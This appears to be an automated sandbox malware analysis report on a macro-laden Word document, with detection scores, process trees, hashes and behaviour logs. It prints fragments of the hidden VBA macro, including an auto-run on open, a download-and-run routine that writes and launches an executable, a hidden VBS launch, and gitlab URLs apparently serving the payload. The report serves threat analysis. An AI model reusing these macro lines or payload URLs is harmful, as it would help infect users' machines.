Edit tour

Windows Analysis Report
q9JZUaS1Gy.doc

Overview

General Information

Sample name:	q9JZUaS1Gy.doc renamed because original name is a hash value
Original sample name:	0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1.doc
Analysis ID:	1590807
MD5:	f8de9b2f8b9088be3dda1985fe7b20c3
SHA1:	edba0fb7fdd51294bf183a8d7ab8992bb1762ff5
SHA256:	0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1
Tags:	app8490744dochko247blackuser-JAMESWT_MHT
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with base64 encoded strings

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains an embedded VBA which might only executes on specific systems (country or language check)

Document contains embedded VBA macros

IP address seen in connection with other malware

Sigma detected: Execution of Suspicious File Type Extension

Spawns drivers

Classification

Process Tree

System is w11x64_office

WINWORD.EXE (PID: 8144 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)

SystemSettingsBroker.exe (PID: 6876 cmdline: C:\Windows\System32\SystemSettingsBroker.exe -Embedding MD5: 899E65893CDEE7F9022DC9B583F94F0F)

rassstp.sys (PID: 4 cmdline: MD5: 6931A955F0697B3A675E3F1B1B058D96)

ndproxy.sys (PID: 4 cmdline: MD5: 8236B9B87FCB51A225A5B69A23C6DCBA)

agilevpn.sys (PID: 4 cmdline: MD5: 9470BBB777C18559249CB627755AE05A)

rasl2tp.sys (PID: 4 cmdline: MD5: 31026F5886DD4B3507C26173933722BE)

raspptp.sys (PID: 4 cmdline: MD5: DD210C0462E41139AA1E06AE8C82C6BA)

raspppoe.sys (PID: 4 cmdline: MD5: A664DB4B37AB3904F14242E7882469FB)

ndistapi.sys (PID: 4 cmdline: MD5: F2EB1438623A09E1659E5B5706D15B38)

ndiswan.sys (PID: 4 cmdline: MD5: E63671FE12F81F56D79B1CC58305AD64)

smartscreen.exe (PID: 6976 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: D447511B1A99D72F21DC1A148F1A32A3)

cleanup

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rassstp.sys, NewProcessName: C:\Windows\System32\drivers\rassstp.sys, OriginalFileName: C:\Windows\System32\drivers\rassstp.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rassstp.sys

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: q9JZUaS1Gy.doc	Virustotal: Detection: 53%			Perma Link
Source: q9JZUaS1Gy.doc	ReversingLabs: Detection: 39%

Machine Learning detection for sample

Source: q9JZUaS1Gy.doc

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll

Jump to behavior

Source: Joe Sandbox View	IP Address: 52.113.194.132 52.113.194.132
Source: Joe Sandbox View	IP Address: 52.109.68.129 52.109.68.129
Source: Joe Sandbox View	IP Address: 52.109.28.46 52.109.28.46
Source: Joe Sandbox View	IP Address: 23.38.98.104 23.38.98.104

Source: q9JZUaS1Gy.doc	String found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/up$
Source: q9JZUaS1Gy.doc	String found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/up$v

System Summary

Document contains an embedded VBA macro which may execute processes

Source: q9JZUaS1Gy.doc	OLE, VBA macro line: shell.Run """" & savePath & """", 1, False
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: shell.ShellExecute vbsFilePath, "", "", "open", 0

Document contains an embedded VBA macro with suspicious strings

Source: q9JZUaS1Gy.doc	OLE, VBA macro line: savePath = Environ("USERPROFILE") & "\Documents\example.exe" ' u?ng d?n luu file
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
Source: q9JZUaS1Gy.doc	OLE, VBA macro line: shell.ShellExecute vbsFilePath, "", "", "open", 0
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function DownloadAndRunEXE, String environ: savePath = Environ("USERPROFILE") & "\Documents\example.exe"	Name: DownloadAndRunEXE
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function DownloadAndRunEXE, String wscript: Set shell = CreateObject("WScript.Shell")	Name: DownloadAndRunEXE
Source: VBA code instrumentation	OLE, VBA macro: Module ViewSession, Function ikwiwiejs_19293_Ade, String environ: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"	Name: ikwiwiejs_19293_Ade
Source: VBA code instrumentation	OLE, VBA macro: Module ViewSession, Function ikwiwiejs_19293_Ade, String shellexecute: shell.ShellExecute vbsFilePath, "", "", "open", 0	Name: ikwiwiejs_19293_Ade

Document contains an embedded VBA with base64 encoded strings

Source: VBA code instrumentation	OLE, VBA macro: Module Module3, Function pvCryptoAesCtrInit, String ObjectLength
Source: VBA code instrumentation	OLE, VBA macro: Module Module3, Function pvCryptoAesCtrInit, String HashDigestLength

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: q9JZUaS1Gy.doc	Stream path 'Macros/VBA/Module2' : found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function GetDataFromURL, found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send			Name: GetDataFromURL

Source: q9JZUaS1Gy.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ksksksksksksks, Function Document_Open			Name: Document_Open

Source: q9JZUaS1Gy.doc

OLE indicator, VBA macros: true

Source: unknown

Driver loaded: C:\Windows\System32\drivers\rassstp.sys

Source: classification engine

Classification label: mal76.expl.evad.winDOC@4/2@0/7

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$JZUaS1Gy.doc

Jump to behavior

Source: C:\Windows\System32\smartscreen.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{CCD3FCA0-1F43-43B7-9680-FD659AA2A5C3} - OProcSessId.dat

Jump to behavior

Source: q9JZUaS1Gy.doc

OLE indicator, Word Document stream: true

Source: q9JZUaS1Gy.doc

OLE document summary: title field not present or empty

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\SystemSettingsBroker.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: q9JZUaS1Gy.doc	Virustotal: Detection: 53%
Source: q9JZUaS1Gy.doc	ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\SystemSettingsBroker.exe C:\Windows\System32\SystemSettingsBroker.exe -Embedding
Source: unknown	Process created: C:\Windows\System32\smartscreen.exe C:\Windows\System32\smartscreen.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: systemsettings.datamodel.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: settingshandlers_display.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: cfgmgr32.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: deviceassociation.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.cloudstore.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: appextension.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: audiohandlers.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: uvcmodel.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: settingshandlers_accessibility.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.internal.accessibility.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.internal.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: settingshandlers_sharedexperiences_rome.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.devices.radios.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: settingshandlers_devices.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: wincorlib.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.media.devices.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: languageoverlayutil.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: deviceflows.datamodel.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: threadpoolwinrt.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: devdispitemprovider.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: devicedisplaystatusmanager.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: fundisc.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: fddevquery.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.graphics.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: smartscreen.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: windows.management.workplace.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\smartscreen.exe	Section loaded: policymanager.dll	Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Window detected: Number of UI elements: 13
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Window detected: Number of UI elements: 13

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll

Jump to behavior

Data Obfuscation

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: q9JZUaS1Gy.doc	Stream path 'Macros/VBA/Module3' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Module3			Name: Module3

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
